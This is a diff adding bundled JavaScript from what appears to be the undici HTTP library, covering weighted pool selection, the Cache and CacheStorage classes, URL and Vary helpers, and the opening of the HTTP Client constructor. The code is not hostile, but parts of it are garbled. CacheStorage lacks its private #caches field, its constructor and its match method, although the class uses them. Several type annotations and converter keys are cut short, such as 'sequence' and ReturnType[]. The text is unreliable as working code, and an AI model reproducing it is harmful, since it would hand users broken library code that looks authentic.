+ if (this[kIndex] === 0) { + // Set the current weight to the next lower weight. + this[kCurrentWeight] = this[kCurrentWeight] - this[kGreatestCommonDivisor] + + if (this[kCurrentWeight] <= 0) { + this[kCurrentWeight] = this[kMaxWeightPerServer] + } + } + if (pool[kWeight] >= this[kCurrentWeight] && (!pool[kNeedDrain])) { + return pool + } + } + + this[kCurrentWeight] = this[kClients][maxWeightIndex][kWeight] + this[kIndex] = maxWeightIndex + return this[kClients][maxWeightIndex] + } +} + +module.exports = BalancedPool + + +/***/ }), + +/***/ 6101: +/***/ ((module, __unused_webpack_exports, __nccwpck_require__) => { + +"use strict"; + + +const { kConstruct } = __nccwpck_require__(9174) +const { urlEquals, fieldValues: getFieldValues } = __nccwpck_require__(2396) +const { kEnumerableProperty, isDisturbed } = __nccwpck_require__(3983) +const { kHeadersList } = __nccwpck_require__(2785) +const { webidl } = __nccwpck_require__(1744) +const { Response, cloneResponse } = __nccwpck_require__(7823) +const { Request } = __nccwpck_require__(8359) +const { kState, kHeaders, kGuard, kRealm } = __nccwpck_require__(5861) +const { fetching } = __nccwpck_require__(4881) +const { urlIsHttpHttpsScheme, createDeferredPromise, readAllBytes } = __nccwpck_require__(2538) +const assert = __nccwpck_require__(9491) +const { getGlobalDispatcher } = __nccwpck_require__(1892) + +/** + * @see https://w3c.github.io/ServiceWorker/#dfn-cache-batch-operation + * @typedef {Object} CacheBatchOperation + * @property {'delete' | 'put'} type + * @property {any} request + * @property {any} response + * @property {import('../../types/cache').CacheQueryOptions} options + */ + +/** + * @see https://w3c.github.io/ServiceWorker/#dfn-request-response-list + * @typedef {[any, any][]} requestResponseList + */ + +class Cache { + /** + * @see https://w3c.github.io/ServiceWorker/#dfn-relevant-request-response-list + * @type {requestResponseList} + */ + #relevantRequestResponseList + + constructor () { + if 
(arguments[0] !== kConstruct) { + webidl.illegalConstructor() + } + + this.#relevantRequestResponseList = arguments[1] + } + + async match (request, options = {}) { + webidl.brandCheck(this, Cache) + webidl.argumentLengthCheck(arguments, 1, { header: 'Cache.match' }) + + request = webidl.converters.RequestInfo(request) + options = webidl.converters.CacheQueryOptions(options) + + const p = await this.matchAll(request, options) + + if (p.length === 0) { + return + } + + return p[0] + } + + async matchAll (request = undefined, options = {}) { + webidl.brandCheck(this, Cache) + + if (request !== undefined) request = webidl.converters.RequestInfo(request) + options = webidl.converters.CacheQueryOptions(options) + + // 1. + let r = null + + // 2. + if (request !== undefined) { + if (request instanceof Request) { + // 2.1.1 + r = request[kState] + + // 2.1.2 + if (r.method !== 'GET' && !options.ignoreMethod) { + return [] + } + } else if (typeof request === 'string') { + // 2.2.1 + r = new Request(request)[kState] + } + } + + // 5. + // 5.1 + const responses = [] + + // 5.2 + if (request === undefined) { + // 5.2.1 + for (const requestResponse of this.#relevantRequestResponseList) { + responses.push(requestResponse[1]) + } + } else { // 5.3 + // 5.3.1 + const requestResponses = this.#queryCache(r, options) + + // 5.3.2 + for (const requestResponse of requestResponses) { + responses.push(requestResponse[1]) + } + } + + // 5.4 + // We don't implement CORs so we don't need to loop over the responses, yay! + + // 5.5.1 + const responseList = [] + + // 5.5.2 + for (const response of responses) { + // 5.5.2.1 + const responseObject = new Response(response.body?.source ?? null) + const body = responseObject[kState].body + responseObject[kState] = response + responseObject[kState].body = body + responseObject[kHeaders][kHeadersList] = response.headersList + responseObject[kHeaders][kGuard] = 'immutable' + + responseList.push(responseObject) + } + + // 6. 
+ return Object.freeze(responseList) + } + + async add (request) { + webidl.brandCheck(this, Cache) + webidl.argumentLengthCheck(arguments, 1, { header: 'Cache.add' }) + + request = webidl.converters.RequestInfo(request) + + // 1. + const requests = [request] + + // 2. + const responseArrayPromise = this.addAll(requests) + + // 3. + return await responseArrayPromise + } + + async addAll (requests) { + webidl.brandCheck(this, Cache) + webidl.argumentLengthCheck(arguments, 1, { header: 'Cache.addAll' }) + + requests = webidl.converters['sequence'](requests) + + // 1. + const responsePromises = [] + + // 2. + const requestList = [] + + // 3. + for (const request of requests) { + if (typeof request === 'string') { + continue + } + + // 3.1 + const r = request[kState] + + // 3.2 + if (!urlIsHttpHttpsScheme(r.url) || r.method !== 'GET') { + throw webidl.errors.exception({ + header: 'Cache.addAll', + message: 'Expected http/s scheme when method is not GET.' + }) + } + } + + // 4. + /** @type {ReturnType[]} */ + const fetchControllers = [] + + // 5. + for (const request of requests) { + // 5.1 + const r = new Request(request)[kState] + + // 5.2 + if (!urlIsHttpHttpsScheme(r.url)) { + throw webidl.errors.exception({ + header: 'Cache.addAll', + message: 'Expected http/s scheme.' + }) + } + + // 5.4 + r.initiator = 'fetch' + r.destination = 'subresource' + + // 5.5 + requestList.push(r) + + // 5.6 + const responsePromise = createDeferredPromise() + + // 5.7 + fetchControllers.push(fetching({ + request: r, + dispatcher: getGlobalDispatcher(), + processResponse (response) { + // 1. + if (response.type === 'error' || response.status === 206 || response.status < 200 || response.status > 299) { + responsePromise.reject(webidl.errors.exception({ + header: 'Cache.addAll', + message: 'Received an invalid status code or the request failed.' + })) + } else if (response.headersList.contains('vary')) { // 2. 
+ // 2.1 + const fieldValues = getFieldValues(response.headersList.get('vary')) + + // 2.2 + for (const fieldValue of fieldValues) { + // 2.2.1 + if (fieldValue === '*') { + responsePromise.reject(webidl.errors.exception({ + header: 'Cache.addAll', + message: 'invalid vary field value' + })) + + for (const controller of fetchControllers) { + controller.abort() + } + + return + } + } + } + }, + processResponseEndOfBody (response) { + // 1. + if (response.aborted) { + responsePromise.reject(new DOMException('aborted', 'AbortError')) + return + } + + // 2. + responsePromise.resolve(response) + } + })) + + // 5.8 + responsePromises.push(responsePromise.promise) + } + + // 6. + const p = Promise.all(responsePromises) + + // 7. + const responses = await p + + // 7.1 + const operations = [] + + // 7.2 + let index = 0 + + // 7.3 + for (const response of responses) { + // 7.3.1 + /** @type {CacheBatchOperation} */ + const operation = { + type: 'put', // 7.3.2 + request: requestList[index], // 7.3.3 + response // 7.3.4 + } + + operations.push(operation) // 7.3.5 + + index++ // 7.3.6 + } + + // 7.5 + const cacheJobPromise = createDeferredPromise() + + // 7.6.1 + let errorData = null + + // 7.6.2 + try { + this.#batchCacheOperations(operations) + } catch (e) { + errorData = e + } + + // 7.6.3 + queueMicrotask(() => { + // 7.6.3.1 + if (errorData === null) { + cacheJobPromise.resolve(undefined) + } else { + // 7.6.3.2 + cacheJobPromise.reject(errorData) + } + }) + + // 7.7 + return cacheJobPromise.promise + } + + async put (request, response) { + webidl.brandCheck(this, Cache) + webidl.argumentLengthCheck(arguments, 2, { header: 'Cache.put' }) + + request = webidl.converters.RequestInfo(request) + response = webidl.converters.Response(response) + + // 1. + let innerRequest = null + + // 2. + if (request instanceof Request) { + innerRequest = request[kState] + } else { // 3. + innerRequest = new Request(request)[kState] + } + + // 4. 
+ if (!urlIsHttpHttpsScheme(innerRequest.url) || innerRequest.method !== 'GET') { + throw webidl.errors.exception({ + header: 'Cache.put', + message: 'Expected an http/s scheme when method is not GET' + }) + } + + // 5. + const innerResponse = response[kState] + + // 6. + if (innerResponse.status === 206) { + throw webidl.errors.exception({ + header: 'Cache.put', + message: 'Got 206 status' + }) + } + + // 7. + if (innerResponse.headersList.contains('vary')) { + // 7.1. + const fieldValues = getFieldValues(innerResponse.headersList.get('vary')) + + // 7.2. + for (const fieldValue of fieldValues) { + // 7.2.1 + if (fieldValue === '*') { + throw webidl.errors.exception({ + header: 'Cache.put', + message: 'Got * vary field value' + }) + } + } + } + + // 8. + if (innerResponse.body && (isDisturbed(innerResponse.body.stream) || innerResponse.body.stream.locked)) { + throw webidl.errors.exception({ + header: 'Cache.put', + message: 'Response body is locked or disturbed' + }) + } + + // 9. + const clonedResponse = cloneResponse(innerResponse) + + // 10. + const bodyReadPromise = createDeferredPromise() + + // 11. + if (innerResponse.body != null) { + // 11.1 + const stream = innerResponse.body.stream + + // 11.2 + const reader = stream.getReader() + + // 11.3 + readAllBytes(reader).then(bodyReadPromise.resolve, bodyReadPromise.reject) + } else { + bodyReadPromise.resolve(undefined) + } + + // 12. + /** @type {CacheBatchOperation[]} */ + const operations = [] + + // 13. + /** @type {CacheBatchOperation} */ + const operation = { + type: 'put', // 14. + request: innerRequest, // 15. + response: clonedResponse // 16. + } + + // 17. + operations.push(operation) + + // 19. 
+ const bytes = await bodyReadPromise.promise + + if (clonedResponse.body != null) { + clonedResponse.body.source = bytes + } + + // 19.1 + const cacheJobPromise = createDeferredPromise() + + // 19.2.1 + let errorData = null + + // 19.2.2 + try { + this.#batchCacheOperations(operations) + } catch (e) { + errorData = e + } + + // 19.2.3 + queueMicrotask(() => { + // 19.2.3.1 + if (errorData === null) { + cacheJobPromise.resolve() + } else { // 19.2.3.2 + cacheJobPromise.reject(errorData) + } + }) + + return cacheJobPromise.promise + } + + async delete (request, options = {}) { + webidl.brandCheck(this, Cache) + webidl.argumentLengthCheck(arguments, 1, { header: 'Cache.delete' }) + + request = webidl.converters.RequestInfo(request) + options = webidl.converters.CacheQueryOptions(options) + + /** + * @type {Request} + */ + let r = null + + if (request instanceof Request) { + r = request[kState] + + if (r.method !== 'GET' && !options.ignoreMethod) { + return false + } + } else { + assert(typeof request === 'string') + + r = new Request(request)[kState] + } + + /** @type {CacheBatchOperation[]} */ + const operations = [] + + /** @type {CacheBatchOperation} */ + const operation = { + type: 'delete', + request: r, + options + } + + operations.push(operation) + + const cacheJobPromise = createDeferredPromise() + + let errorData = null + let requestResponses + + try { + requestResponses = this.#batchCacheOperations(operations) + } catch (e) { + errorData = e + } + + queueMicrotask(() => { + if (errorData === null) { + cacheJobPromise.resolve(!!requestResponses?.length) + } else { + cacheJobPromise.reject(errorData) + } + }) + + return cacheJobPromise.promise + } + + /** + * @see https://w3c.github.io/ServiceWorker/#dom-cache-keys + * @param {any} request + * @param {import('../../types/cache').CacheQueryOptions} options + * @returns {readonly Request[]} + */ + async keys (request = undefined, options = {}) { + webidl.brandCheck(this, Cache) + + if (request !== undefined) 
request = webidl.converters.RequestInfo(request) + options = webidl.converters.CacheQueryOptions(options) + + // 1. + let r = null + + // 2. + if (request !== undefined) { + // 2.1 + if (request instanceof Request) { + // 2.1.1 + r = request[kState] + + // 2.1.2 + if (r.method !== 'GET' && !options.ignoreMethod) { + return [] + } + } else if (typeof request === 'string') { // 2.2 + r = new Request(request)[kState] + } + } + + // 4. + const promise = createDeferredPromise() + + // 5. + // 5.1 + const requests = [] + + // 5.2 + if (request === undefined) { + // 5.2.1 + for (const requestResponse of this.#relevantRequestResponseList) { + // 5.2.1.1 + requests.push(requestResponse[0]) + } + } else { // 5.3 + // 5.3.1 + const requestResponses = this.#queryCache(r, options) + + // 5.3.2 + for (const requestResponse of requestResponses) { + // 5.3.2.1 + requests.push(requestResponse[0]) + } + } + + // 5.4 + queueMicrotask(() => { + // 5.4.1 + const requestList = [] + + // 5.4.2 + for (const request of requests) { + const requestObject = new Request('https://a') + requestObject[kState] = request + requestObject[kHeaders][kHeadersList] = request.headersList + requestObject[kHeaders][kGuard] = 'immutable' + requestObject[kRealm] = request.client + + // 5.4.2.1 + requestList.push(requestObject) + } + + // 5.4.3 + promise.resolve(Object.freeze(requestList)) + }) + + return promise.promise + } + + /** + * @see https://w3c.github.io/ServiceWorker/#batch-cache-operations-algorithm + * @param {CacheBatchOperation[]} operations + * @returns {requestResponseList} + */ + #batchCacheOperations (operations) { + // 1. + const cache = this.#relevantRequestResponseList + + // 2. + const backupCache = [...cache] + + // 3. 
+ const addedItems = [] + + // 4.1 + const resultList = [] + + try { + // 4.2 + for (const operation of operations) { + // 4.2.1 + if (operation.type !== 'delete' && operation.type !== 'put') { + throw webidl.errors.exception({ + header: 'Cache.#batchCacheOperations', + message: 'operation type does not match "delete" or "put"' + }) + } + + // 4.2.2 + if (operation.type === 'delete' && operation.response != null) { + throw webidl.errors.exception({ + header: 'Cache.#batchCacheOperations', + message: 'delete operation should not have an associated response' + }) + } + + // 4.2.3 + if (this.#queryCache(operation.request, operation.options, addedItems).length) { + throw new DOMException('???', 'InvalidStateError') + } + + // 4.2.4 + let requestResponses + + // 4.2.5 + if (operation.type === 'delete') { + // 4.2.5.1 + requestResponses = this.#queryCache(operation.request, operation.options) + + // TODO: the spec is wrong, this is needed to pass WPTs + if (requestResponses.length === 0) { + return [] + } + + // 4.2.5.2 + for (const requestResponse of requestResponses) { + const idx = cache.indexOf(requestResponse) + assert(idx !== -1) + + // 4.2.5.2.1 + cache.splice(idx, 1) + } + } else if (operation.type === 'put') { // 4.2.6 + // 4.2.6.1 + if (operation.response == null) { + throw webidl.errors.exception({ + header: 'Cache.#batchCacheOperations', + message: 'put operation should have an associated response' + }) + } + + // 4.2.6.2 + const r = operation.request + + // 4.2.6.3 + if (!urlIsHttpHttpsScheme(r.url)) { + throw webidl.errors.exception({ + header: 'Cache.#batchCacheOperations', + message: 'expected http or https scheme' + }) + } + + // 4.2.6.4 + if (r.method !== 'GET') { + throw webidl.errors.exception({ + header: 'Cache.#batchCacheOperations', + message: 'not get method' + }) + } + + // 4.2.6.5 + if (operation.options != null) { + throw webidl.errors.exception({ + header: 'Cache.#batchCacheOperations', + message: 'options must not be defined' + }) + } + + // 
4.2.6.6 + requestResponses = this.#queryCache(operation.request) + + // 4.2.6.7 + for (const requestResponse of requestResponses) { + const idx = cache.indexOf(requestResponse) + assert(idx !== -1) + + // 4.2.6.7.1 + cache.splice(idx, 1) + } + + // 4.2.6.8 + cache.push([operation.request, operation.response]) + + // 4.2.6.10 + addedItems.push([operation.request, operation.response]) + } + + // 4.2.7 + resultList.push([operation.request, operation.response]) + } + + // 4.3 + return resultList + } catch (e) { // 5. + // 5.1 + this.#relevantRequestResponseList.length = 0 + + // 5.2 + this.#relevantRequestResponseList = backupCache + + // 5.3 + throw e + } + } + + /** + * @see https://w3c.github.io/ServiceWorker/#query-cache + * @param {any} requestQuery + * @param {import('../../types/cache').CacheQueryOptions} options + * @param {requestResponseList} targetStorage + * @returns {requestResponseList} + */ + #queryCache (requestQuery, options, targetStorage) { + /** @type {requestResponseList} */ + const resultList = [] + + const storage = targetStorage ?? 
this.#relevantRequestResponseList + + for (const requestResponse of storage) { + const [cachedRequest, cachedResponse] = requestResponse + if (this.#requestMatchesCachedItem(requestQuery, cachedRequest, cachedResponse, options)) { + resultList.push(requestResponse) + } + } + + return resultList + } + + /** + * @see https://w3c.github.io/ServiceWorker/#request-matches-cached-item-algorithm + * @param {any} requestQuery + * @param {any} request + * @param {any | null} response + * @param {import('../../types/cache').CacheQueryOptions | undefined} options + * @returns {boolean} + */ + #requestMatchesCachedItem (requestQuery, request, response = null, options) { + // if (options?.ignoreMethod === false && request.method === 'GET') { + // return false + // } + + const queryURL = new URL(requestQuery.url) + + const cachedURL = new URL(request.url) + + if (options?.ignoreSearch) { + cachedURL.search = '' + + queryURL.search = '' + } + + if (!urlEquals(queryURL, cachedURL, true)) { + return false + } + + if ( + response == null || + options?.ignoreVary || + !response.headersList.contains('vary') + ) { + return true + } + + const fieldValues = getFieldValues(response.headersList.get('vary')) + + for (const fieldValue of fieldValues) { + if (fieldValue === '*') { + return false + } + + const requestValue = request.headersList.get(fieldValue) + const queryValue = requestQuery.headersList.get(fieldValue) + + // If one has the header and the other doesn't, or one has + // a different value than the other, return false + if (requestValue !== queryValue) { + return false + } + } + + return true + } +} + +Object.defineProperties(Cache.prototype, { + [Symbol.toStringTag]: { + value: 'Cache', + configurable: true + }, + match: kEnumerableProperty, + matchAll: kEnumerableProperty, + add: kEnumerableProperty, + addAll: kEnumerableProperty, + put: kEnumerableProperty, + delete: kEnumerableProperty, + keys: kEnumerableProperty +}) + +const cacheQueryOptionConverters = [ + { + key: 
'ignoreSearch', + converter: webidl.converters.boolean, + defaultValue: false + }, + { + key: 'ignoreMethod', + converter: webidl.converters.boolean, + defaultValue: false + }, + { + key: 'ignoreVary', + converter: webidl.converters.boolean, + defaultValue: false + } +] + +webidl.converters.CacheQueryOptions = webidl.dictionaryConverter(cacheQueryOptionConverters) + +webidl.converters.MultiCacheQueryOptions = webidl.dictionaryConverter([ + ...cacheQueryOptionConverters, + { + key: 'cacheName', + converter: webidl.converters.DOMString + } +]) + +webidl.converters.Response = webidl.interfaceConverter(Response) + +webidl.converters['sequence'] = webidl.sequenceConverter( + webidl.converters.RequestInfo +) + +module.exports = { + Cache +} + + +/***/ }), + +/***/ 7907: +/***/ ((module, __unused_webpack_exports, __nccwpck_require__) => { + +"use strict"; + + +const { kConstruct } = __nccwpck_require__(9174) +const { Cache } = __nccwpck_require__(6101) +const { webidl } = __nccwpck_require__(1744) +const { kEnumerableProperty } = __nccwpck_require__(3983) + +class CacheStorage { + /** + * @see https://w3c.github.io/ServiceWorker/#dfn-relevant-name-to-cache-map + * @type {Map} + */ + async has (cacheName) { + webidl.brandCheck(this, CacheStorage) + webidl.argumentLengthCheck(arguments, 1, { header: 'CacheStorage.has' }) + + cacheName = webidl.converters.DOMString(cacheName) + + // 2.1.1 + // 2.2 + return this.#caches.has(cacheName) + } + + /** + * @see https://w3c.github.io/ServiceWorker/#dom-cachestorage-open + * @param {string} cacheName + * @returns {Promise} + */ + async open (cacheName) { + webidl.brandCheck(this, CacheStorage) + webidl.argumentLengthCheck(arguments, 1, { header: 'CacheStorage.open' }) + + cacheName = webidl.converters.DOMString(cacheName) + + // 2.1 + if (this.#caches.has(cacheName)) { + // await caches.open('v1') !== await caches.open('v1') + + // 2.1.1 + const cache = this.#caches.get(cacheName) + + // 2.1.1.1 + return new Cache(kConstruct, cache) 
+ } + + // 2.2 + const cache = [] + + // 2.3 + this.#caches.set(cacheName, cache) + + // 2.4 + return new Cache(kConstruct, cache) + } + + /** + * @see https://w3c.github.io/ServiceWorker/#cache-storage-delete + * @param {string} cacheName + * @returns {Promise} + */ + async delete (cacheName) { + webidl.brandCheck(this, CacheStorage) + webidl.argumentLengthCheck(arguments, 1, { header: 'CacheStorage.delete' }) + + cacheName = webidl.converters.DOMString(cacheName) + + return this.#caches.delete(cacheName) + } + + /** + * @see https://w3c.github.io/ServiceWorker/#cache-storage-keys + * @returns {string[]} + */ + async keys () { + webidl.brandCheck(this, CacheStorage) + + // 2.1 + const keys = this.#caches.keys() + + // 2.2 + return [...keys] + } +} + +Object.defineProperties(CacheStorage.prototype, { + [Symbol.toStringTag]: { + value: 'CacheStorage', + configurable: true + }, + match: kEnumerableProperty, + has: kEnumerableProperty, + open: kEnumerableProperty, + delete: kEnumerableProperty, + keys: kEnumerableProperty +}) + +module.exports = { + CacheStorage +} + + +/***/ }), + +/***/ 9174: +/***/ ((module, __unused_webpack_exports, __nccwpck_require__) => { + +"use strict"; + + +module.exports = { + kConstruct: (__nccwpck_require__(2785).kConstruct) +} + + +/***/ }), + +/***/ 2396: +/***/ ((module, __unused_webpack_exports, __nccwpck_require__) => { + +"use strict"; + + +const assert = __nccwpck_require__(9491) +const { URLSerializer } = __nccwpck_require__(685) +const { isValidHeaderName } = __nccwpck_require__(2538) + +/** + * @see https://url.spec.whatwg.org/#concept-url-equals + * @param {URL} A + * @param {URL} B + * @param {boolean | undefined} excludeFragment + * @returns {boolean} + */ +function urlEquals (A, B, excludeFragment = false) { + const serializedA = URLSerializer(A, excludeFragment) + + const serializedB = URLSerializer(B, excludeFragment) + + return serializedA === serializedB +} + +/** + * @see 
https://github.com/chromium/chromium/blob/694d20d134cb553d8d89e5500b9148012b1ba299/content/browser/cache_storage/cache_storage_cache.cc#L260-L262 + * @param {string} header + */ +function fieldValues (header) { + assert(header !== null) + + const values = [] + + for (let value of header.split(',')) { + value = value.trim() + + if (!value.length) { + continue + } else if (!isValidHeaderName(value)) { + continue + } + + values.push(value) + } + + return values +} + +module.exports = { + urlEquals, + fieldValues +} + + +/***/ }), + +/***/ 3598: +/***/ ((module, __unused_webpack_exports, __nccwpck_require__) => { + +"use strict"; +// @ts-check + + + +/* global WebAssembly */ + +const assert = __nccwpck_require__(9491) +const net = __nccwpck_require__(1808) +const http = __nccwpck_require__(3685) +const { pipeline } = __nccwpck_require__(2781) +const util = __nccwpck_require__(3983) +const timers = __nccwpck_require__(9459) +const Request = __nccwpck_require__(2905) +const DispatcherBase = __nccwpck_require__(4839) +const { + RequestContentLengthMismatchError, + ResponseContentLengthMismatchError, + InvalidArgumentError, + RequestAbortedError, + HeadersTimeoutError, + HeadersOverflowError, + SocketError, + InformationalError, + BodyTimeoutError, + HTTPParserError, + ResponseExceededMaxSizeError, + ClientDestroyedError +} = __nccwpck_require__(8045) +const buildConnector = __nccwpck_require__(2067) +const { + kUrl, + kReset, + kServerName, + kClient, + kBusy, + kParser, + kConnect, + kBlocking, + kResuming, + kRunning, + kPending, + kSize, + kWriting, + kQueue, + kConnected, + kConnecting, + kNeedDrain, + kNoRef, + kKeepAliveDefaultTimeout, + kHostHeader, + kPendingIdx, + kRunningIdx, + kError, + kPipelining, + kSocket, + kKeepAliveTimeoutValue, + kMaxHeadersSize, + kKeepAliveMaxTimeout, + kKeepAliveTimeoutThreshold, + kHeadersTimeout, + kBodyTimeout, + kStrictContentLength, + kConnector, + kMaxRedirections, + kMaxRequests, + kCounter, + kClose, + kDestroy, + kDispatch, 
+ kInterceptors, + kLocalAddress, + kMaxResponseSize, + kHTTPConnVersion, + // HTTP2 + kHost, + kHTTP2Session, + kHTTP2SessionState, + kHTTP2BuildRequest, + kHTTP2CopyHeaders, + kHTTP1BuildRequest +} = __nccwpck_require__(2785) + +/** @type {import('http2')} */ +let http2 +try { + http2 = __nccwpck_require__(5158) +} catch { + // @ts-ignore + http2 = { constants: {} } +} + +const { + constants: { + HTTP2_HEADER_AUTHORITY, + HTTP2_HEADER_METHOD, + HTTP2_HEADER_PATH, + HTTP2_HEADER_SCHEME, + HTTP2_HEADER_CONTENT_LENGTH, + HTTP2_HEADER_EXPECT, + HTTP2_HEADER_STATUS + } +} = http2 + +// Experimental +let h2ExperimentalWarned = false + +const FastBuffer = Buffer[Symbol.species] + +const kClosedResolve = Symbol('kClosedResolve') + +const channels = {} + +try { + const diagnosticsChannel = __nccwpck_require__(7643) + channels.sendHeaders = diagnosticsChannel.channel('undici:client:sendHeaders') + channels.beforeConnect = diagnosticsChannel.channel('undici:client:beforeConnect') + channels.connectError = diagnosticsChannel.channel('undici:client:connectError') + channels.connected = diagnosticsChannel.channel('undici:client:connected') +} catch { + channels.sendHeaders = { hasSubscribers: false } + channels.beforeConnect = { hasSubscribers: false } + channels.connectError = { hasSubscribers: false } + channels.connected = { hasSubscribers: false } +} + +/** + * @type {import('../types/client').default} + */ +class Client extends DispatcherBase { + /** + * + * @param {string|URL} url + * @param {import('../types/client').Client.Options} options + */ + constructor (url, { + interceptors, + maxHeaderSize, + headersTimeout, + socketTimeout, + requestTimeout, + connectTimeout, + bodyTimeout, + idleTimeout, + keepAlive, + keepAliveTimeout, + maxKeepAliveTimeout, + keepAliveMaxTimeout, + keepAliveTimeoutThreshold, + socketPath, + pipelining, + tls, + strictContentLength, + maxCachedSessions, + maxRedirections, + connect, + maxRequestsPerClient, + localAddress, + maxResponseSize, 
+ autoSelectFamily, + autoSelectFamilyAttemptTimeout, + // h2 + allowH2, + maxConcurrentStreams + } = {}) { + super() + + if (keepAlive !== undefined) { + throw new InvalidArgumentError('unsupported keepAlive, use pipelining=0 instead') + } + + if (socketTimeout !== undefined) { + throw new InvalidArgumentError('unsupported socketTimeout, use headersTimeout & bodyTimeout instead') + } + + if (requestTimeout !== undefined) { + throw new InvalidArgumentError('unsupported requestTimeout, use headersTimeout & bodyTimeout instead') + } + + if (idleTimeout !== undefined) { + throw new InvalidArgumentError('unsupported idleTimeout, use keepAliveTimeout instead') + } + + if (maxKeepAliveTimeout !== undefined) { + throw new InvalidArgumentError('unsupported maxKeepAliveTimeout, use keepAliveMaxTimeout instead') + } + + if (maxHeaderSize != null && !Number.isFinite(maxHeaderSize)) { + throw new InvalidArgumentError('invalid maxHeaderSize') + } + + if (socketPath != null && typeof socketPath !== 'string') { + throw new InvalidArgumentError('invalid socketPath') + } + + if (connectTimeout != null && (!Number.isFinite(connectTimeout) || connectTimeout < 0)) { + throw new InvalidArgumentError('invalid connectTimeout') + } + + if (keepAliveTimeout != null && (!Number.isFinite(keepAliveTimeout) || keepAliveTimeout <= 0)) { + throw new InvalidArgumentError('invalid keepAliveTimeout') + } + + if (keepAliveMaxTimeout != null && (!Number.isFinite(keepAliveMaxTimeout) || keepAliveMaxTimeout <= 0)) { + throw new InvalidArgumentError('invalid keepAliveMaxTimeout') + } + + if (keepAliveTimeoutThreshold != null && !Number.isFinite(keepAliveTimeoutThreshold)) { + throw new InvalidArgumentError('invalid keepAliveTimeoutThreshold') + } + + if (headersTimeout != null && (!Number.isInteger(headersTimeout) || headersTimeout < 0)) { + throw new InvalidArgumentError('headersTimeout must be a positive integer or zero') + } + + if (bodyTimeout != null && (!Number.isInteger(bodyTimeout) || 
bodyTimeout < 0)) { + throw new InvalidArgumentError('bodyTimeout must be a positive integer or zero') + } + + if (connect != null && typeof connect !== 'function' && typeof connect !== 'object') { + throw new InvalidArgumentError('connect must be a function or an object') + } + + if (maxRedirections != null && (!Number.isInteger(maxRedirections) || maxRedirections < 0)) { + throw new InvalidArgumentError('maxRedirections must be a positive number') + } + + if (maxRequestsPerClient != null && (!Number.isInteger(maxRequestsPerClient) || maxRequestsPerClient < 0)) { + throw new InvalidArgumentError('maxRequestsPerClient must be a positive number') + } + + if (localAddress != null && (typeof localAddress !== 'string' || net.isIP(localAddress) === 0)) { + throw new InvalidArgumentError('localAddress must be valid string IP address') + } + + if (maxResponseSize != null && (!Number.isInteger(maxResponseSize) || maxResponseSize < -1)) { + throw new InvalidArgumentError('maxResponseSize must be a positive number') + } + + if ( + autoSelectFamilyAttemptTimeout != null && + (!Number.isInteger(autoSelectFamilyAttemptTimeout) || autoSelectFamilyAttemptTimeout < -1) + ) { + throw new InvalidArgumentError('autoSelectFamilyAttemptTimeout must be a positive number') + } + + // h2 + if (allowH2 != null && typeof allowH2 !== 'boolean') { + throw new InvalidArgumentError('allowH2 must be a valid boolean value') + } + + if (maxConcurrentStreams != null && (typeof maxConcurrentStreams !== 'number' || maxConcurrentStreams < 1)) { + throw new InvalidArgumentError('maxConcurrentStreams must be a possitive integer, greater than 0') + } + + if (typeof connect !== 'function') { + connect = buildConnector({ + ...tls, + maxCachedSessions, + allowH2, + socketPath, + timeout: connectTimeout, + ...(util.nodeHasAutoSelectFamily && autoSelectFamily ? 
{ autoSelectFamily, autoSelectFamilyAttemptTimeout } : undefined), + ...connect + }) + } + + this[kInterceptors] = interceptors && interceptors.Client && Array.isArray(interceptors.Client) + ? interceptors.Client + : [createRedirectInterceptor({ maxRedirections })] + this[kUrl] = util.parseOrigin(url) + this[kConnector] = connect + this[kSocket] = null + this[kPipelining] = pipelining != null ? pipelining : 1 + this[kMaxHeadersSize] = maxHeaderSize || http.maxHeaderSize + this[kKeepAliveDefaultTimeout] = keepAliveTimeout == null ? 4e3 : keepAliveTimeout + this[kKeepAliveMaxTimeout] = keepAliveMaxTimeout == null ? 600e3 : keepAliveMaxTimeout + this[kKeepAliveTimeoutThreshold] = keepAliveTimeoutThreshold == null ? 1e3 : keepAliveTimeoutThreshold + this[kKeepAliveTimeoutValue] = this[kKeepAliveDefaultTimeout] + this[kServerName] = null + this[kLocalAddress] = localAddress != null ? localAddress : null + this[kResuming] = 0 // 0, idle, 1, scheduled, 2 resuming + this[kNeedDrain] = 0 // 0, idle, 1, scheduled, 2 resuming + this[kHostHeader] = `host: ${this[kUrl].hostname}${this[kUrl].port ? `:${this[kUrl].port}` : ''}\r\n` + this[kBodyTimeout] = bodyTimeout != null ? bodyTimeout : 300e3 + this[kHeadersTimeout] = headersTimeout != null ? headersTimeout : 300e3 + this[kStrictContentLength] = strictContentLength == null ? true : strictContentLength + this[kMaxRedirections] = maxRedirections + this[kMaxRequests] = maxRequestsPerClient + this[kClosedResolve] = null + this[kMaxResponseSize] = maxResponseSize > -1 ? maxResponseSize : -1 + this[kHTTPConnVersion] = 'h1' + + // HTTP/2 + this[kHTTP2Session] = null + this[kHTTP2SessionState] = !allowH2 + ? null + : { + // streams: null, // Fixed queue of streams - For future support of `push` + openStreams: 0, // Keep track of them to decide wether or not unref the session + maxConcurrentStreams: maxConcurrentStreams != null ? 
maxConcurrentStreams : 100 // Max peerConcurrentStreams for a Node h2 server + } + this[kHost] = `${this[kUrl].hostname}${this[kUrl].port ? `:${this[kUrl].port}` : ''}` + + // kQueue is built up of 3 sections separated by + // the kRunningIdx and kPendingIdx indices. + // | complete | running | pending | + // ^ kRunningIdx ^ kPendingIdx ^ kQueue.length + // kRunningIdx points to the first running element. + // kPendingIdx points to the first pending element. + // This implements a fast queue with an amortized + // time of O(1). + + this[kQueue] = [] + this[kRunningIdx] = 0 + this[kPendingIdx] = 0 + } + + get pipelining () { + return this[kPipelining] + } + + set pipelining (value) { + this[kPipelining] = value + resume(this, true) + } + + get [kPending] () { + return this[kQueue].length - this[kPendingIdx] + } + + get [kRunning] () { + return this[kPendingIdx] - this[kRunningIdx] + } + + get [kSize] () { + return this[kQueue].length - this[kRunningIdx] + } + + get [kConnected] () { + return !!this[kSocket] && !this[kConnecting] && !this[kSocket].destroyed + } + + get [kBusy] () { + const socket = this[kSocket] + return ( + (socket && (socket[kReset] || socket[kWriting] || socket[kBlocking])) || + (this[kSize] >= (this[kPipelining] || 1)) || + this[kPending] > 0 + ) + } + + /* istanbul ignore: only used for test */ + [kConnect] (cb) { + connect(this) + this.once('connect', cb) + } + + [kDispatch] (opts, handler) { + const origin = opts.origin || this[kUrl].origin + + const request = this[kHTTPConnVersion] === 'h2' + ? Request[kHTTP2BuildRequest](origin, opts, handler) + : Request[kHTTP1BuildRequest](origin, opts, handler) + + this[kQueue].push(request) 